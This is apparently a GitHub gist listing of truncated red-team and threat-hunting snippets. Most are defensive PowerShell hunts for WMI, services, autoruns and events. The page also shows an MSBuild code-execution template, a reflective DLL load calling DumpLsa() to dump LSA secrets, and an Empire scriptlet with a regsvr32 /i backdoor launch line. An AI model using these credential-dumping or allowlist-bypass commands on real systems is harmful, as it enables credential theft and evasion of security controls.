nullbind / poc.png
Created May 22, 2019 — forked from caseysmithrc/poc.png
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View TellMeYourSecrets.ps1
# PowerShellery
# Source: https://github.com/0xbadjuju/TellMeYourSecrets
# Note: This was hacked together for the sake of portability.
# Note: To refresh TellMeYourSecrets.dll do the following:
# $Bytes = [System.IO.File]::ReadAllBytes("C:\temp\TellMeYourSecrets.dll")
# $MyString = [System.Convert]::ToBase64String($Bytes)
# or
# $Bytes = [System.IO.File]::ReadAllBytes("C:\users\istest1\Desktop\TellMeYourSecrets.dll")
# [System.Reflection.Assembly]::Load($Bytes)
# [TellMeYourSecrets.LSA]::DumpLsa()
nullbind / Get-DomainComputerWSMAN.ps1
Created May 1, 2019
Get-DomainComputerWSMAN.ps1
# This script uses the ActiveDirectory module to enumerate live Windows systems on the domain that support WMI/PS Remoting,
# and filters out Win7 and 2k3 hosts.
# Run it from a domain-joined system, or from a non-domain system via 'runas /netonly /user:domain\user powershell.exe'
# (/netonly only applies the supplied credentials to network connections, so the DC lookup below still works).
# Initial DC: IP or FQDN of a reachable domain controller in the target domain (lab value below; change before use)
$InitialDc = '10.4.222.205'
# Create connection to initial dc
Import-Module ActiveDirectory
nullbind / Invoke-HuntWmiSubscription.ps1
Created May 1, 2019
Invoke-HuntWmiSubscription.ps1
# Author: Alexander Leary
#--------------------------------------------------------------------------------
# Add-ObjectWMI
#--------------------------------------------------------------------------------
Function local:Add-ObjectWMI{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true,
ValueFromPipelineByPropertyName=$true, HelpMessage="Name")]
[string]$Name = "",
View FindFiles.ps1
# Collect the entries of the all-users Startup folder from every host behind the current PS remoting sessions.
# $env:ALLUSERSPROFILE sits inside the script block, so it is expanded on the remote host, not locally.
$allusersstartuP = Invoke-Command -Session (Get-PSSession) -ScriptBlock {
    Get-ChildItem -Path "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs\StartUp\" | Select-Object -Property FullName
}
View Invoke-HuntEvents.ps1
function Invoke-HuntEvents {
# Set event ids
$x = "4768,4662,1917,216,8224,20001,106,4720,4732"
# Parse into list
$y = $x.Split(',')
# Look up events
nullbind / Invoke-HuntServiceInfo.ps1
Created May 1, 2019
Invoke-HuntServiceInfo.ps1
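# Service inventory for persistence hunting: binary path (check for unquoted paths and odd locations),
# start mode, state and the account the service runs as.
# Run it through Invoke-Command against all active PS remoting sessions; the query then executes on each remote host.
# Get-CimInstance is used instead of Get-WmiObject, which no longer exists on PowerShell 7+; the Win32_Service
# property names are identical. "ServiceName" is not a Win32_Service property and always came back blank, so
# DisplayName is reported in its place; StartName (service account) and State are added for triage.
Get-CimInstance -ClassName Win32_Service |
    Select-Object -Property Name, DisplayName, Description, PathName, ServiceType, StartMode, StartName, State, Status, InstallDate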
nullbind / Invoke-HuntServiceInfo.ps1
Created May 1, 2019
Invoke-HuntServiceInfo.ps1
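# Service inventory for persistence hunting: binary path (check for unquoted paths and odd locations),
# start mode, state and the account the service runs as.
# Run it through Invoke-Command against all active PS remoting sessions; the query then executes on each remote host.
# Get-CimInstance is used instead of Get-WmiObject, which no longer exists on PowerShell 7+; the Win32_Service
# property names are identical. "ServiceName" is not a Win32_Service property and always came back blank, so
# DisplayName is reported in its place; StartName (service account) and State are added for triage.
Get-CimInstance -ClassName Win32_Service |
    Select-Object -Property Name, DisplayName, Description, PathName, ServiceType, StartMode, StartName, State, Status, InstallDate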
nullbind / Invoke-HuntRegAutoruns.ps1
Last active May 1, 2019
Invoke-HuntRegAutoruns.ps1
# Usage: run this script through existing PowerShell remoting sessions (Invoke-Command -Session ...); the recipe below shows how to open them
# New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user
# cd RemoteADS:
# Get-ADComputer -Filter * -Properties name | select @{Name="ComputerName";Expression={$_."name"}} | New-PSSession
# (this opens a session to every computer object in the domain, stale ones included; narrow -Filter, e.g. on Enabled/OperatingSystem/LastLogonDate, before running at scale)
# Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1
# $Results = Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1
# $ScriptBlock = "ps code"
# Invoke-Command -Session (Get-PSSession) -ScriptBlock ([ScriptBlock]::Create($ScriptBlock))
# (note: -ScriptBlock {$ScriptBlock} would not run the code: it only evaluates the variable, and local variables are not visible inside a remote script block)
# Invoke-Command -Session (Get-PSSession) -FilePath C:\Invoke-HuntRegAutoruns.ps1
# $Results | Export-Csv -Notypeinformation results.csv
nullbind / testingthings.sct
Last active Apr 30, 2019
testingthings.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- Launch: regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll  (the path after /i must point at this .sct file; /s suppresses dialogs) -->